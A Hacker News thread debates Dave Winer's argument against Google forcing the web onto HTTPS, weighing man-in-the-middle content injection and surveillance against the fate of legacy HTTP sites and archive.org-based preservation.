Hacker News new | comments | show | ask | jobs | submit login

> HTTPS is an open standard. Google doesn't control it. HTTPS doesn't require anyone to use any Google product.

The problem is that Google controls the most popular interfaces to consuming HTTP and HTTPS, i.e. their Chrome browser and their search engine. And so Google is in a position where they control how these protocols are consumed, which is the crux of Dave's argument. Google is already discouraging the use of HTTP through warning messages in Chrome and by adjusting search rank algorithms for HTTP sites. Dave's concern is that Google will "turn off" HTTP access in the same way they did with RSS after capturing the market share for consuming RSS feeds and then shutting down Google Reader and removing discoverabilty of RSS feeds in Chrome.

Dave Winer has been around the Web for longer than most and you'd be foolish to write him off as a curmudgeon. Dave is to the open Web what RMS is to FOSS.




It is immensely frustrating to me that Dave's excellent point about legacy content is obscured by his characterization of the push to HTTPS. At the core, the idea that security only matters for transactions is wrong. For example, I want my blog to be served over HTTPS because I don't want anyone to be able to edit my words between my server and the person reading them.

Now, Dave acknowledges this: "They tell us to worry about man-in-the-middle attacks that might modify content, but fail to mention that they can do it in the browser, even if you use a 'secure' protocol."

The rhetorical slip here is bad. "They" is me. I say you should worry about man-in-the-middle attacks. I can't "do it in the browser." He keeps doing this; he's acting like Google is the only entity that thinks the move is a good idea.

It also fails to acknowledge that partial solutions matter! What, I should give up on putting locks on my door just because the lock manufacturer can go right through them? Further, right now I have a choice of three plausible browsers, and I can switch between them freely. There's a significant difference between the danger of man-in-the-middle attacks and the danger of a browser level attack. (Both pretty low, to be fair, but still.)

And that's just the concern about attacks. Tracking is a whole additional issue that he doesn't acknowledge.

So, yeah, he makes some good points. But since he won't engage in discussion on the topic, they're not useful and they get drowned out by the noise.


won't engage in discussion -- it's been a long day, lots of discussion, and most of it repetitive. The fact that so much discussion is needed is a pretty good indication that the open web should not be corporatized. Google should create a new medium, like they did with AMP, and make it opt-in. Stop trying to be the dictator of the web. And you -- please stop saying bullshit about me. Thanks. Tired.


> Dave is to the open Web what RMS is to FOSS.

This is a great analogy!


Thank you, that's a very nice thing to say. Over the years I've come to respect Stallman's way of viewing things more and more.

The open web is worth fighting for. And Google is moving into new territory now, by deciding to force sites to switch to HTTPS. Most of the arguments you hear are about new sites, but people are missing that the web has been used for 25 years as an archiving medium. If you want to save something so it's available for others (and yourself too) in the future, put it on the web. It's been incredibly stable platform, far more so than the ones run by the tech industry, and precisely because it isn't run by the tech industry.

That's about to change.

Read the original post. Today's post is just a continuation of that one.

http://this.how/googleAndHttp/

And be a little more kind to Stallman. :-)

Dave


With all due respect, I read the original post, and it does not seem terribly compelling to me.

> Something bad could happen to my pages in transit from a server to the user's web browser.

This already happens. Verizon injects tracking cookies into unencrypted requests [1]. Hotels inject advertising on top of the existing advertising [personal experience]. They will do it when I read your blog archive from 2001. They will inject arbitrary JavaScript that records my every keystroke and mouse movement [2]. State actors will use persistent surveillance of all unencrypted cookies to pierce firewalls and target individual engineers in charge of anything they happen to find useful [3]. They will do worse things as compute becomes cheaper and cheaper.

If your argument is that there are lots of HTTP sites that are historically important and also that are unmaintained and that will never be upgraded, okay. That is a solvable technical problem [4].

If you want to know why you have to force people to do it, it is because security is a public health issue [5]. It is the same reason you have to force people to get vaccinations.

I don't work for Google (in fact I work for a direct competitor), and I disagree with a lot of the things that they do or want to do (unsurprisingly). But having more security on the web is not one of them. We live in a very different world than we did 25-plus years ago.

[1] https://www.eff.org/deeplinks/2014/11/verizon-x-uidh

[2] https://www.wired.com/story/the-dark-side-of-replay-sessions...

[3] https://theintercept.com/2014/12/13/belgacom-hack-gchq-insid... (search for MUTANT BROTH)

[4] https://archive.org/

[5] https://www.schneier.com/blog/archives/2014/03/security_as_a...


I generally agree with you, but I do not think that [4] is the solution for maintaining history. Archive.org is great, but the average user doesn't know how to get there once the base URL stops working.

We need maybe proxies as close to the origin servers as possible, to minimize the amount of traffic passing over insecure links. That seems like a political nightmare, but...


I didn't claim [4] was the solution. I claimed the problem was solvable. One example of how to improve on [4] is to build into browsers the option of automatically searching archive.org whenever you hit a 404.


Naturally, that feature already exists as a Firefox extension. Making it more visible would be awesome.

https://addons.mozilla.org/en-US/firefox/addon/resurrect-pag...


That doesn't solve the discoverability problem for good, as the 404ing links will themselves be removed after a while; what we really need is a good search engine for the archives.

Of course, the whole point of this article is that centralisation of important resources is risky. Archive.org is an essential resource, and it's really far too important to be at the sole mercy of the of the Internet Archive organisation, well meaning and admirable in every way though they are.


I don't disagree. There are alternatives to archive.org [6]. There are ways to decentralize centralized services. I'm sure you can think of many more ways to do better than what is done. I mostly linked to https://archive.org because of the "https" in the URL. My point is that there are technical solutions to the technical problem of preserving history that do not require weakening the security of the whole internet.

[6] https://archive.is/


I am in very strong agreement, and apologize for nitpicking.


The solution is do nothing. Leave it the fuck alone.




Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact

Search: